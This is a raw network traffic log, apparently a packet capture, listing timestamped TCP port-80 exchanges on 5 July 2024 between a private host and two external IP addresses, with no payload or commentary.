                                                                Jul 5, 2024 04:23:18.567318916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567331076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567337036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567348957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567365885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567375898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567378998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567405939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567420006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567440033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567450047 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567456007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567465067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567477942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567481041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567503929 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567517042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567522049 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567528963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567564011 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567632914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567643881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567653894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567666054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567667961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567677975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567688942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567692995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567701101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567713022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567713976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567723989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567727089 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567745924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567764997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567768097 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567775965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567785978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567795992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567809105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567832947 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567894936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567907095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567915916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567925930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567936897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567938089 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567948103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567953110 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567960978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.567971945 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.567995071 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568044901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568063021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568074942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568085909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568098068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568099976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568111897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568114042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568124056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568135023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568136930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568156004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568159103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568175077 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568192959 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568260908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568273067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568281889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568293095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568304062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568305969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568316936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568327904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568335056 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568341970 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568363905 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568416119 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568427086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568435907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568448067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568449974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568459034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568470001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568473101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568486929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568495035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568500996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568507910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568514109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.568531990 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568537951 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.568557978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569209099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569227934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569237947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569245100 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569262981 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569272041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569309950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569322109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569329977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569344044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569355965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569356918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569370031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569376945 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569390059 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569392920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569413900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569417000 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569421053 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569505930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569518089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569525957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569555044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569570065 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569588900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569600105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569610119 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569628000 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569638014 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569638968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569649935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569658041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569675922 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569689035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569694996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569700956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569710970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569730043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569736958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569741011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569752932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569753885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569763899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569778919 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569803953 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569813013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569823980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569833994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569854021 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569859982 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569864035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569875002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.569897890 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.569906950 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.583849907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.583861113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.583870888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.583918095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.583935022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.583946943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.583947897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.583960056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.583971977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.583981991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.583983898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.584007978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.584013939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.629424095 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:18.629683971 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:18.634455919 CEST804974977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:18.634727001 CEST804974877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:18.634807110 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:18.634813070 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:18.634964943 CEST4974980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:18.639666080 CEST804974977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:18.657751083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.657769918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.657782078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.657905102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.657915115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.657917023 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.657922029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.657932997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.657955885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.657968044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.657994032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658005953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658030033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658050060 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658114910 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658126116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658135891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658148050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658155918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658159018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658184052 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658199072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658271074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658281088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658291101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658302069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658313990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658318996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658327103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658334970 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658351898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658370018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658416033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658432961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658442974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658458948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658471107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658483028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658485889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658485889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658500910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658510923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658519030 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658523083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658534050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658545017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658555031 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658576012 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658590078 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658653021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658665895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658675909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658688068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658698082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658701897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658710957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658734083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658752918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658763885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658773899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658780098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658823013 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658829927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658862114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658873081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658881903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.658904076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658915997 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.658999920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659012079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659023046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659033060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659045935 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659065962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659070015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659079075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659089088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659100056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659107924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659111977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659122944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659147978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659281969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659291029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659301043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659312010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659322977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659324884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659334898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659336090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659358978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659374952 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659517050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659527063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659538031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659548998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659559011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659567118 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659570932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659581900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659588099 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659603119 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659612894 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659780979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659796000 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659807920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659826040 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659836054 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659859896 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659873962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659885883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659894943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659905910 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659915924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659920931 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659929037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659935951 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659940004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.659955978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.659976006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.660063028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.660104990 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.660813093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.660825014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.660835028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.660866022 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.660883904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661077023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661087990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661097050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661108017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661118984 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661124945 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661148071 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661159039 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661220074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661231995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661242962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661253929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661266088 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661267996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661278963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661305904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661461115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661472082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661480904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661493063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661503077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661513090 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661514997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661526918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661539078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661545992 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661545992 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661556959 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661559105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661570072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661571980 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661587000 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661598921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661608934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661608934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661614895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661624908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.661679029 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661679029 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.661679029 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.674890041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.674900055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.674911976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.674951077 CEST804973285.28.47.30192.168.2.4
